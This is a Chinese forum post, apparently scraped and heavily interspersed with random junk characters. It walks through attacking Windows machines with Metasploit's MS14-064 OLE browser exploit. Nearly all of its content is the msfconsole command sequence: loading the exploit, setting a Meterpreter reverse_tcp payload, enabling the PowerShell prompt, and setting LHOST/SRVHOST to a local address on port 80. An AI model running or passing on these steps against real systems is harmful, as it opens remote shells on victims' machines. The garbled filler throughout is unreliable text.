5 x R+ f7 c4 E$ s; [8 I 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示+ b$ h! f2 _5 b( g, |/ P- L
- i$ d' ~7 m- M7 ^3 a
4 o7 Y4 a! c: x, g2 { 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
7 ~5 |: X) C( Z) F9 x
4 @: x5 Y+ r! {, U+ I
2 s" B9 p2 D8 E5 o- f! E
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
l8 b, i% C9 R6 u
! M; W& O& G: K* X- P
$ z. ^ V, ~( c- w: N# t
set AllowPowershellPrompt true( ~! w8 P$ R! W/ e) U5 ?
5 G" X2 y6 X% w" X# @" z, r2 `5 x0 S U/ A$ D2 J
Set LHOST 192.168.0.109
5 F" S$ L- V1 V+ B- \, i
' s. F6 }" h$ d7 d
+ t) n$ h8 p9 M/ J set SRVHOST 192.168.0.109! ]% D7 a2 V6 f$ W; ~9 C+ s; M" d
& z/ t+ m$ j2 X5 v" V
; y+ @# w/ s$ d2 @
Set uripath share
: V1 r( M4 R* E2 s
4 }; D+ l. M/ d, W& L
$ X! f" `: E* x9 P- g Set srvport 80
4 }' V- o2 A3 X E6 e- W6 X
% R& s- `& S3 y+ @" x
+ R3 s* y% Q L" E
. g9 t, @; b6 U( H, Q# ^+ ]" a3 T
% p. J* x- g0 H2 x
) x0 ?; [5 _: J+ O6 I( D q" ^' J- S }% y& m$ m2 \0 a
0 X1 W% ~7 _5 V; q9 N# n8 W- s1 F* s# c; ?& ]1 v4 G/ R1 I$ O8 M
0 y9 s9 Z/ W$ _1 [" ~
5 F) U) K0 h4 P; x' r! _5 |& u' s3 A) E- ^
) n% ~! _6 b3 F- ?! y
- ~$ |* {, t/ |) k6 f3 l
+ e% Q; r) Y) m - U/ [4 S, {0 j3 e u
6 B& L$ E }: M4 V1 x
8 a" z1 {1 n6 e6 F9 c
下面我们来访问本地地址如图: F: k: M+ W) b5 \" |; n c
0 [ n6 w# N' {" m: f. O
5 Y* [ ^; R1 p- \- ~: U
; H D; R5 Q; t5 j
; p! ~6 X/ t. O
2 g" b3 }2 Q3 ]/ s" [- V" c7 a) A" S
# d' l. L# Y7 c- i
^5 q( {- w% z I, h$ L
0 I9 Y( J% c4 c3 `1 T; W& E
$ `& d2 M) c( F" _$ d p) c